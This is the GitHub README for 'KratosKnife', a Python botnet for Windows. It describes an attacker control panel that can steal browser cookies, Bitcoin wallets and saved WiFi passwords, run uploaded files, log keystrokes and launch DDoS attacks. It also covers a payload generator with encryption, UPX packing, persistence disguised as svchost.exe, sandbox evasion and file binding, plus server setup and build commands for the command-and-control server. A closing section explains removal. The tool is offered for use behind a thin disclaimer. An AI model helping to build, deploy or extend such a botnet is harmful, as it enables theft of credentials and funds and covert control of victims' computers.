Skip to content

KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc

License

Notifications You must be signed in to change notification settings

PushpenderIndia/KratosKnife

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

KratosKnife Logo

KratosKnife

KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc

Disclaimer

💻 This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Note: Some Features are under development

Commands Available In Attacker/Admin Panel

Clients Command Location Stealer
1. Ping 1. Get Location Information 1. Steal Firefox Cookie
2. Upload & Execute File 2. Show Location On Map 2. Steal Chrome Cookie
3. Show MessageBox Computer Commands 3. Steal Bitcoin Wallet
4. Take Screenshot 1. Shutdown 4. Steal WiFI Saved Password
5. Installed Software 2. Restart Keylogger
6. Execute Scripts 3. Logoff 1. Start Keylogger [Under Development]
7. Elevate User Status Open Webpage 2. Stop Keylogger [Under Development]
8. Clear TEMP Folder 1. Open Webpage (Visible) 3. Retrive Logs [Under Development]
Clients Commands DDOS Attack
1. Close Connection Start DDOS [Under Development]
2. Move Client [Under Development] Stop DDOS [Under Development]
3. Blacklist IP [Under Development]
4. Update Client [Under Development]
5. Restart Client [Under Development]
6. Uninstall [Under Development]

Generator Features

  • Encrypt Source Code Using AES 256 Bit Encryption
  • Encrypt Source Code Using Base64 Encoding
  • Packing Evil Exe Using UPX Packer
  • Interactive Mode [Generator Ask Required Parameter]
  • Debug Mode [Can Be Used In Debugging Payload]
  • Persistence Payload
  • 3 Powerfull Methods to Detect/Bypass VM (such as VirtualBox, VMware, Sandboxie)
  • Built-in File Binder
  • Useful Icons Inside icon Folder
Virtual Machine Bypass Methods Includes
Registry Check
Processes and Files Check
MAC Adderess Check

Screenshots

Login Page

Dashboard (Attacker Control Panel)

Show Victim Location On Map [NOTE: Location is IP Based, Not GPS]

Prerequisite

  • Python 3.X
  • Few External Modules

Server Setup

  1. Upload & Unzip panel.zip on your hosting available in this repo
  2. Create a database with any name you want
  3. Change the data in classes/Database.php
  4. Change files and folders permission to 777 [Uploads Folder, Scripts Folder]
  5. Go to install.php to create the botnet tables automatically
  • [For Testing Locally]
  1. Install XAMPP, & Put panel files inside htdocs folder and Run Apache & MySQL Service In XAMPP Controller
  2. Create a database with any name you want
  3. Change the data in classes/Database.php
  4. Go to install.php to create the botnet tables automatically

Usage

# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/KratosKnife.git

# Go into the repository
$ cd KratosKnife/Botnet-Generator

# Installing dependencies
$ python -m pip install -r requirements.txt

# Update pyinstaller.exe path, in Generator.py (line 9) 

# Getting Help Menu
$ python Generator.py --help

# Making Payload/BOTNET
$ python Generator.py -s localhost/panel -o output_file_name --icon icon/exe.ico

Available Arguments

  • Optional Arguments
Short Hand Full Hand Description
-h --help show this help message and exit
--interactive Takes Input by asking Questions
--icon ICON Specify Icon Path, Icon of Evil File [Note : Must Be .ico]
-i INTERVAL --interval INTERVAL Time between reports in seconds. default=12. [Under Development]
-t TIME_PERSISTENT --persistence TIME_PERSISTENT Becoming Persistence After __ seconds. default=10
-b file.txt --bind LEGITIMATE_FILE_PATH.pdf Built-In Binder : Specify Path of Legitimate file. [Under Development]
  • Required Arguments
Short Hand Full Hand Description
-s SERVER --server SERVER Command & Control Server for Botnet.
-o OUT --output OUTPUT Output file name.

Removing BOTNET

Method 1:

  • Go to start, type regedit and run the first program, this will open the registry editor.
  • Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called "WindowsUpdate", right click this entry and select Delete.
  • Go to your user path > AppData > Roaming, you’ll see a file named “svchost.exe”, this is the RAT, right click > Delete.
  • Restart the System.

Method 2:

  • Run "RemoveBOTNET.bat" in Infected System.
  • Restart Infected PC to stop the current Running Evil File.
  • Run "RemoveBOTNET.bat" again.

TODO

  • Add New features
  • Add GUI BOTNET Generator

More Features Coming Soon...